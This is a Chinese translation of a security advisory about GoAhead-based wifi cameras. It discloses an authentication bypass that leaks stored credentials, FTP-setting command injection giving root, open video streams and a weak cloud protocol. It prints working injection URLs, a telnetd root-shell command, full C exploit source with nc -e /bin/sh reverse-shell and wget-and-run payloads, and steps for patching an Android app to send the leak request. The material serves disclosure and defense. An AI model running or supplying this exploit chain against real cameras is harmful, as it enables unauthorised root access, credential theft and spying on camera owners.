00000270: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000280: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000290: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]
00000640: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000650: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000660: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000680: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
000006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000006d0: 030a 0a0f 8000 0000 0101 0003 0002 0000 ................
[...]
user@kali$

要浏览.cgi文件,攻击者还需要进行身份验证:

user@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse=BAD_LOGIN&loginpas=BAD_PASS'
var result="Auth Failed";
user@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse&loginpas'
var result="Auth Failed";

但它访问.ini文件不用正确检查。攻击者可以通过在URI中提供一个空的loginuse和空loginpas来绕过身份验证:

user@kali$ wget -qO- 'http://192.168.1.107/system.ini?loginuse&loginpas'|xxd|less
00000000: 5749 4649 4341 4d00 0000 0000 0000 0000 WIFICAM.........
00000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000020: 0000 0100 0000 0000 0000 0000 0000 0000 ................
[...]
00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
[...]

PoC:

./expl 192.168.1.107 --get-config | xxd | grep 000003

00000030: 6d53 6563 0a0a 5b2b 5d20 6279 7061 7373 mSec..[+] bypass
00000300: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000310: 0000 0000 0000 0000 0000 0000 0a0a 0a0a ................
00000320: 0100 0000 0a03 0100 0000 0000 0000 0000 ................
00000330: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000340: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000350: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000360: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000370: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000380: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000390: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003a0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin.
000003b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003c0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin.
000003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003e0: 0000 0000 0000 0000 0000 030a 0a0f 8000 ................
000003f0: 0000 0101 0003 0002 0000 0080 8080 8001 ................

此漏洞允许攻击者窃取凭据,包括ftp帐户和smtp帐户(电子邮件)。

详细信息 – 以root身份验证的RCE

RCE存在于ftp配置CGI中。在这里这里的两个比较好的文档报告了几个不同的相机模型。

该划分区符/以只读方式安装,因此无法在此分区中进行修改。

命令注入位于set_ftp.cgi(可见$(ftp x.com)):

http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(ftp x.com)ftp&dir=/&mode=PORT&upload_interval=0
http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin

当执行tcpdump时,我们可以看到x.com的DNS解析:

00:00:00.151107 IP 192.168.1.107.33551 > 8.8.8.8.53: 40888+ A? x.com. (23)

所以,ftp x.com被执行。

我们可以使用telnetd binary来启动一个无认证的telnetd访问:

user@kali$ wget -qO- 'http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'
user@kali$ wget -qO- 'http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin'

这可以给我们在端口25 / tcp的root帐户:

user@kali$ telnet 192.168.1.107 25
Trying 192.168.1.107...
Connected to 192.168.1.107.
Escape character is '^]'.

/ # id
uid=0(root) gid=0
/ # uname -ap
Linux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 mips GNU/Linux
/ # mount
rootfs on / type rootfs (rw)
/dev/root on / type squashfs (ro,relatime)
/proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
tmpfs on /dev type tmpfs (rw,relatime,size=2048k)
tmpfs on /tmp type tmpfs (rw,relatime,size=5120k)
devpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)
/dev/mtdblock3 on /system type jffs2 (rw,relatime)
/ #

/etc是只读的。所以,命令注入不能写入/etc。注入位于/tmp/ftpupload.sh

/ # cat /tmp/ftpupload.sh 
/bin/ftp -n<<!
open 192.168.1.1 21
user ftp $(telnetd -l /bin/sh -p 25)ftp
binary
lcd /tmp
put ftptest.txt
close
bye
!
/ #

详细信息 – 作为root预认证RCE

通过组合自定义http服务器漏洞中的预认证信息泄漏,然后以root身份验证RCE,攻击者可以在LAN或Internet上以root身份实现预身份验证RCE。

这里提供了一个漏洞利用,可以用来获得连接回来的根RCE。

这个漏洞可以:

  1. 通过连接到目标相机的远程自定义HTTP服务器来提取有效的凭据
  2. 覆盖连接 nc
  3. 执行有效负载
  4. 攻击者将在第二个终端上接收带有netcat的root shell
  5. 清除位于配置文件中的有效内容

它影响1250+个相机型号。

演示:

ser@kali$ gcc -Wall -o expl expl-goahead-camera.c && ./expl 192.168.1.107 
Camera 0day root RCE with connect-back @PierreKimSec

Please run `nc -vlp 1337` on 192.168.1.1

[+] bypassing auth ... done
 login = admin
 pass = admin
[+] planting payload ... done
[+] executing payload ... done
[+] cleaning payload ... done
[+] cleaning payload ... done
[+] enjoy your root shell on 192.168.1.1:1337
user@kali$

在第二个xterm:

user@kali$ nc -lvp 1337
listening on [any] 1337 ...
192.168.1.107: inverse host lookup failed: Unknown host
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.107] 47968
id
uid=0(root) gid=0
uname -ap
Linux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 mips GNU/Linux
ps 
PID USER TIME COMMAND
 1 root 0:01 {linuxrc} init
 2 root 0:00 [kthreadd]
 3 root 0:00 [ksoftirqd/0]
 5 root 0:00 [kworker/0:0H]
 6 root 0:00 [kworker/u2:0]
 7 root 0:00 [rcu_preempt]
 8 root 0:00 [rcu_bh]
 9 root 0:00 [rcu_sched]
 10 root 0:00 [watchdog/0]
 11 root 0:00 [khelper]
 12 root 0:00 [writeback]
 13 root 0:00 [bioset]
 14 root 0:00 [kblockd]
 15 root 0:00 [khubd]
 16 root 0:00 [kworker/0:1]
 17 root 0:00 [cfg80211]
 18 root 0:00 [rpciod]
 19 root 0:00 [kswapd0]
 20 root 0:00 [fsnotify_mark]
 21 root 0:00 [nfsiod]
 22 root 0:00 [crypto]
 36 root 0:00 [kworker/u2:1]
 39 root 0:00 [i2s_work_1]
 40 root 0:00 [i2s_codec_irq_w]
 41 root 0:00 [kworker/0:2]
 42 root 0:00 [deferwq]
 43 root 0:00 [kworker/0:1H]
 59 root 0:00 [jffs2_gcd_mtd3]
 61 root 0:00 telnetd
 69 root 0:00 /system/system/bin/wifidaemon
 70 root 0:00 /sbin/getty -L ttyS1 115200 vt100
 98 root 0:01 [RtmpTimerTask]
 99 root 0:00 [RtmpMlmeTask]
 100 root 0:00 [RtmpCmdQTask]
 101 root 0:00 [RtmpWscTask]
 148 root 1:19 /tmp/encoder
 164 root 0:00 [irq/37-isp]
 236 root 0:07 [apical_isp_fw_p]
 2330 root 0:00 sh -c /tmp/ftpupload.sh > /tmp/ftpret.txt
 2331 root 0:00 {exe} ash /tmp/ftpupload.sh
 2332 root 0:00 {exe} ash /tmp/ftpupload.sh
 2333 root 0:00 /bin/ftp -n
 2334 root 0:00 /bin/sh
 2439 root 0:00 ps

这里提供一个漏洞利用:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

#define CAM_PORT 80
#define REMOTE_HOST "192.168.1.1"
#define REMOTE_PORT "1337"
#define PAYLOAD_0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" REMOTE_HOST "+" REMOTE_PORT "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define PAYLOAD_1 "GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n"
#define PAYLOAD_2 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n"


#define ALTERNATIVE_PAYLOAD_zero0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" REMOTE_HOST "+" REMOTE_PORT "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero1 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" REMOTE_HOST "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"

char * creds(char *argv,
 int get_config);

int rce(char *argv,
 char *id,
 char attack[],
 char desc[]);


int main(int argc,
 char **argv,
 char **envp)
{
 char *id;

printf("Camera 0day root RCE with connect-back @PierreKimSec\n\n");

if (argc < 2)
 {
 printf("%s target\n", argv[0]);
 printf("%s target --get-config will dump the configuration and exit\n", argv[0]);
 return (1);
 }

if (argc == 2)
 printf("Please run `nc -vlp %s` on %s\n\n", REMOTE_PORT, REMOTE_HOST);

if (argc == 3 && !strcmp(argv[2], "--get-config"))
 id = creds(argv[1], 1);
 else
 id = creds(argv[1], 0);

if (id == NULL)
 {
 printf("exploit failed\n");
 return (1);
 }
 printf("done\n");

printf(" login = %s\n", id);
 printf(" pass = %s\n", id + 32);

if (!rce(argv[1], id, PAYLOAD_0, "planting"))
 printf("done\n");
 sleep(1);
 if (!rce(argv[1], id, PAYLOAD_1, "executing"))
 printf("done\n");
 if (!rce(argv[1], id, PAYLOAD_2, "cleaning"))
 printf("done\n");
 if (!rce(argv[1], id, PAYLOAD_1, "cleaning"))
 printf("done\n");

printf("[+] enjoy your root shell on %s:%s\n", REMOTE_HOST, REMOTE_PORT);

return (0);
}


char * creds(char *argv,
 int get_config)
{
 int sock;
 int n;
 struct sockaddr_in serv_addr;
 char buf[8192] = { 0 };
 char *out;
 char *tmp;
 char payload[] = "GET /system.ini?loginuse&loginpas HTTP/1.0\r\n\r\n";
 int old_n;
 int n_total;


 sock = 0;
 n = 0;
 old_n = 0;
 n_total = 0;

printf("[+] bypassing auth ... ");

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
 {
 printf("Error while creating socket\n");
 return (NULL);
 }

memset(&serv_addr, '0', sizeof(serv_addr));
 serv_addr.sin_family = AF_INET;
 serv_addr.sin_port = htons(CAM_PORT);

if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
 {
 printf("Error while inet_pton\n");
 return (NULL);
 }

if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
 {
 printf("creds: connect failed\n");
 return (NULL);
 }

if (send(sock, payload, strlen(payload) , 0) < 0)
 {
 printf("creds: send failed\n");
 return (NULL);
 }

if (!(tmp = malloc(10 * 1024 * sizeof(char))))
 return (NULL);

if (!(out = calloc(64, sizeof(char))))
 return (NULL);

while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)
 {
 n_total += n;
 if (n_total < 1024 * 10)
 memcpy(tmp + old_n, buf, n);
 if (n >= 0)
 old_n = n;
 }

close(sock);

/*
 [ HTTP HEADERS ]
 ...

000????: 0000 0a0a 0a0a 01.. .... .... .... ....
 ^^^^ ^^^^ ^^
 Useful reference in the binary data
 in order to to find the positions of
 credentials
 ...
 ... 
 0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
 00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
 00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
 00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
 ...

NOTE: reference can be too:
 000????: 0006 0606 0606 0100 000a .... .... ....

Other method: parse everything, find the "admin" string and extract the associated password
 by adding 31bytes after the address of 'a'[dmin].
 Works if the login is admin (seems to be this by default, but can be changed by the user)
 */

if (get_config)
 {
 for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)
 printf("%c", tmp[j]);
 exit (0);
 }


 for (unsigned int j = 50; j < 10 * 1024; j++)
 {
 if (tmp[j - 4] == 0x0a &&
 tmp[j - 3] == 0x0a &&
 tmp[j - 2] == 0x0a &&
 tmp[j - 1] == 0x0a &&
 tmp[j] == 0x01)
 {
 if (j + 170 < 10 * 1024)
 {
 strcat(out, &tmp[j + 138]);
 strcat(out + 32 * sizeof(char), &tmp[j + 170]);
 free(tmp);

return (out);
 }
 }
 }

free(tmp);

return (NULL);
}

int rce(char *argv,
 char *id,
 char attack[],
 char desc[])
{
 int sock;
 struct sockaddr_in serv_addr;
 char *payload;

if (!(payload = calloc(512, sizeof(char))))
 return (1);

sock = 0;

printf("[+] %s payload ... ", desc);

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
 {
 printf("Error while creating socket\n");
 return (1);
 }

memset(&serv_addr, '0', sizeof(serv_addr));
 serv_addr.sin_family = AF_INET;
 serv_addr.sin_port = htons(CAM_PORT);

if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
 {
 printf("Error while inet_pton\n");
 return (1);
 }

if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
 {
 printf("rce: connect failed\n");
 return (1);
 }


 sprintf(payload, attack, id, id + 32);
 if (send(sock, payload, strlen(payload) , 0) < 0)
 {
 printf("rce: send failed\n");
 return (1);
 }

return (0);
}

或者,你可以通过https://pierrekim.github.io/advisories/expl-goahead-camera.c获取这个漏洞利用。

详细信息 – 其他 – 无认证的流

攻击者可以使用在端口上运行的无认证的RTSP服务器,用10554/tcp来观看没有认证的流。

user@kali$ vlc rstp://192.168.1.107:10554/tcp/av0_1

和:

user@kali$ vlc rstp://192.168.1.107:10554/tcp/av0_0

详细信息 – 综合 – “云”(Aka Botnet)

默认情况下,相机使用“云”功能。

你可以tcpdump相机的流量,这是非常可怕的:

12:09:21.410947 IP 192.168.1.107.46958 > 8.8.8.8.53: 60806+ A? openapi.xg.qq.com.gateway. (43)
12:09:26.429697 IP 192.168.1.107.58156 > 202.96.134.33.53: 60806+ A? openapi.xg.qq.com.gateway. (43)
12:09:31.450033 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)
12:09:35.128919 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48
12:09:35.128932 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48
12:09:35.128933 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48
12:09:36.468849 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ A? www.baidu.com. (31)
12:09:41.488223 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)
12:09:46.507810 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ A? www.baidu.com. (31)
12:09:51.527501 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? www.baidu.com.gateway. (39)
12:09:56.546854 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ A? www.baidu.com.gateway. (39)
12:10:01.566316 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? www.baidu.com.gateway. (39)
12:10:06.575735 ARP, Request who-has 192.168.1.1 tell 192.168.1.107, length 46
12:10:06.575750 ARP, Reply 192.168.1.1 is-at 00:e0:4c:51:55:ed, length 28
12:10:06.585841 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ A? www.baidu.com.gateway. (39)
12:10:11.606030 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? time.nist.gov. (31)
12:10:16.625044 IP 192.168.1.107.44109 > 202.96.134.33.53: 41046+ A? time.nist.gov. (31)
12:10:19.214687 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48
12:10:19.214700 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48
12:10:19.214702 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48
12:10:21.644397 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? time.nist.gov. (31)

相机尝试解析www.baidu.com, openapi.xg.qq.com,来联系硬编码的IP和主机:

  • 121.42.208.86:32100/udp (CN:阿里巴巴),
  • 54.221.213.97:32100/udp (AWS US),
  • 120.24.37.48:32100/udp (CN:阿里巴巴),
  • www.baidu.com:80/tcp (CN:百度)。

看来这就是“云”功能,这默认情况下是启用的。这个功能的安全性没有得到证明。

object.p2pwificam.client.apk提供了Android应用程序来管理我的相机。

2017-cam-p2pwificam-0

Netcam 360也工作:

2017-cam-netcam

看起来,这个网络协议很弱:

  1. 摄像机使用UDP联系远程服务器,
  2. 应用程序使用UDP联系远程服务器,
  3. 应用程序向远程服务器发送请求,询问具有特定序列号的摄像机是否在线,
  4. 服务器将返回“camera doesn’t exit”, “camera is offline” 或者 “camera is online”,,
  5. 如果摄像机在线,则在应用程序和摄像机之间自动建立UDP隧道,使用云服务器作为中继。

UDP隧道:

[Android Application] <===UDP===> Cloud server <===UDP===> [Camera]

然后,应用程序使用UDP隧道到达摄像头:

1 )客户端将使用凭证(仍然以明文形式)向相机发送HTTP请求,

GET check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&

或者:

GET check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&

2 )当证书有效或无效时,摄像机将使用HTTP over UDP进行返回。

如果凭据有效,相机将返回:

result= 0;

如果凭据无效,相机将返回:

result=-1

3 )如果凭据有效,那么应用程序将通过将附加凭据到请求(?loginuse=valid_user&loginpas=valid_pass)来向相机托管的.cgi文件发送HTTP请求。

步骤2详细:

如果认证是OK,那么将转储所有的配置在明文!

2017-cam-cloud-auth-ok

注意:此跟踪是使用下面列出的应用程序之一完成的,以确保应用程序共享同一个“云”网络(在摄像机上运行的守护程序不严格遵守HTTP协议,注意缺少/ !)。

如果认证不正确。相机将返回:

result=-1;

由于没有checking,攻击者可以很简单地破坏凭证。

2017-cam-cloud-auth-fail

步骤3详细:
应用程序发送:

GET get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&

或者

GET /get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&

相机将以明文发送其所有配置进行返回:

var now=1122211111;
var dst_enable=0;
var dst_time=0;
var tz=0;
var ntp_enable=1;
var ntp_svr="time.nist.gov";
var dhcpen=1;
var ip="192.168.2.76";
var mask="255.255.255.0";
var gateway="192.168.2.1";
var dns1="8.8.8.8";
var dns2="192.168.2.1";
var port=80;
var nashost="";
var nasport=0;
var dev2_host="";
var dev2_alias="";
var dev2_user="";
var dev2_pwd="";
var dev2_port=0;
var dev3_host="";
var dev3_alias="";
var dev3_user="";
var dev3_pwd="";
var dev3_port=0;
var dev4_host="";
var dev4_alias="";
var dev4_user="";
var dev4_pwd="";
var dev4_port=0;
var dev5_host="";
var dev5_alias="";
var dev5_user="";
var dev5_pwd="";
var dev5_port=0;
var dev6_host="";
var dev6_alias
[...]
var user1_name="";
var user1_pwd="";
var user2_name="wut";
var user2_pwd="wut";
var user3_name="admin";
var user3_pwd="admin";
[...]

这很有趣,因为攻击者只有知道序列号才能到达相机。即使攻击者不知道凭证,攻击者和摄像机之间的UDP隧道也会被建立。要注意的是隧道绕过NAT和防火墙,允许攻击者到达内部摄像机(如果他们连接到上了互联网)和bruteforce凭据。然后,攻击者可以试图强行获得相机的证书:

GET /get_params.cgi?&loginuse=admin&loginpas=TEST&user=admin&pwd=TEST&

这个协议似乎在很多Android应用程序都常见,即:

这个列表还有待更新,离完成还有很远。

所以,我修改了原来的Android应用程序,以试图预验证Info-Leak漏洞:

k% ls -la
total 14912
drwx------ 2 nobody nogroup 100 Mar 7 08:27 .
drwxrwxrwt 3 root root 140 Mar 7 08:25 ..
-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool
-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar
-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 object.p2pwificam.client.apk
k% ./apktool d object.p2pwificam.client.apk
I: Using Apktool 2.2.2 on object.p2pwificam.client.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
S: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...
S: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable
I: Loading resource table from file: /tmp/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
k%

我编辑管理了所有自定义HTTP请求的库。

有趣的字符串之一是GET /%sloginuse=%s&loginpas=%s&user=%s&pwd=%s

k% xxd ./object.p2pwificam.client/lib/armeabi/libobject_jni.so

0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET 
0001f660: 2f25 736c 6f67 696e 7573 653d 2573 266c /%sloginuse=%s&l
0001f670: 6f67 696e 7061 733d 2573 2675 7365 723d oginpas=%s&user=
0001f680: 2573 2670 7764 3d25 7326 0000 4449 443a %s&pwd=%s&..DID:
0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com
0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con
0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s.
0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai
0001f6d0: 6c65 642e 2e20 2573 2072 6574 7572 6e3a led.. %s return:
0001f6e0: 2025 6400 5265 436f 6e6e 6563 7443 6f75 %d.ReConnectCou
0001f6f0: 6e74 3a20 2564 0a00 5050 5050 5f43 6f6e nt: %d..PPPP_Con
0001f700: 6e65 6374 2073 7563 6365 7373 2e2e 2e6d nect success...m
0001f710: 5f68 5365 7373 696f 6e48 616e 646c 653a _hSessionHandle:

修改后:

0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET 
0001f660: 2f73 7973 7465 6d2e 696e 693f 6c6f 6769 /system.ini?logi
0001f670: 6e75 7365 266c 6f67 696e 7061 7373 2678 nuse&loginpass&x
0001f680: 7878 7878 7878 7878 7826 0000 4449 443a xxxxxxxxx&..DID:
0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com
0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con
0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s.
0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai

然后,让我们重新包装并签名.apk:

k% ./apktool b object.p2pwificam.client
I: Using Apktool 2.2.2
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
S: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...
S: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable
W: warning: string 'conectar' has no default translation.
W: warning: string 'str_ipcamfour' has no default translation.
W: warning: string 'user_pwd_no_show' has no default translation.
I: Copying libs... (/lib)
I: Building apk file...
I: Copying unknown files/dir...
k% openssl genrsa -out key.pem

Generating RSA private key, 2048 bit long modulus
..........................................+++
...................................................................+++
unable to write 'random state'
e is 65537 (0x010001)
k% openssl req -new -key key.pem -out request.pem
[...]
k% openssl x509 -req -days 9999 -in request.pem -signkey key.pem -out certificate.pem
Signature ok
subject=C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
Getting Private key
unable to write 'random state'
k% openssl pkcs8 -topk8 -outform DER -in key.pem -inform PEM -out key.pk8 -nocrypt
k% signapk certificate.pem key.pk8 object.p2pwificam.client/dist/object.p2pwificam.client.apk signed-object.p2pwificam.client.apk
k% ls -latr
total 21560
drwxrwxrwt 3 root root 140 Mar 7 08:25 ..
-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar
-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool
-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 object.p2pwificam.client.apk
drwx------ 9 nobody nogroup 220 Mar 7 08:33 object.p2pwificam.client
-rw------- 1 nobody nogroup 1675 Mar 7 08:33 key.pem
-rw------- 1 nobody nogroup 956 Mar 7 08:33 request.pem
-rw------- 1 nobody nogroup 1111 Mar 7 08:33 certificate.pem
-rw------- 1 nobody nogroup 1217 Mar 7 08:33 key.pk8
drwx------ 3 nobody nogroup 220 Mar 7 08:34 .
-rw------- 1 nobody nogroup 6787146 Mar 7 08:34 signed-object.p2pwificam.client.apk

signed-object.p2pwificam.client.apk 可以使用了。

使用它时,我们看到:

客户端确实system.ini在UDP隧道内发送请求:

2017-cam-system-android

相机确实在UDP隧道内接收到此请求:

2017-cam-system-camera

完成跟踪后是:

2017-cam-system-yolo

看起来pre-auth在云网络中不容易到达。

这个“cloud”协议似乎是一个botnet协议,而不是合法的远程访问协议,并且确实有弱点(明文中的一切,即攻击者可以攻击云中的摄像机,并利用潜在的访问权限来破解内部网络)。

很多P2P(“cloud”)相机实际上使用相同的botnet协议,并且相同的基础设施似乎都是由单个实体管理的。

报告时间轴

  • 2017年2月26日:Pierre Kim发现的漏洞。
  • 2017年3月8日:将公共咨询发送到安全邮件列表。
  • 2017年3月8日:与Embedthis软件交流后,似乎这些漏洞不在GoAhead内部,而是来自中国OEM供应商的定制和专有开发
  • 2017年3月8日:咨询更新。

参考文献

https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt

https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html

供应商响应

由于寻找和联系所有供应商的困难,应用了全面披露。

我建议立即断开相机到互联网。数十万台摄像机受到0天信息泄漏的影响。数百万人正在使用不安全的云网络。

*参考:pierrekim,MottoIN小编编译发布,转载请注明来自MottoIN

原创文章,作者:tom,如若转载,请注明出处:http://www.mottoin.com/98152.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code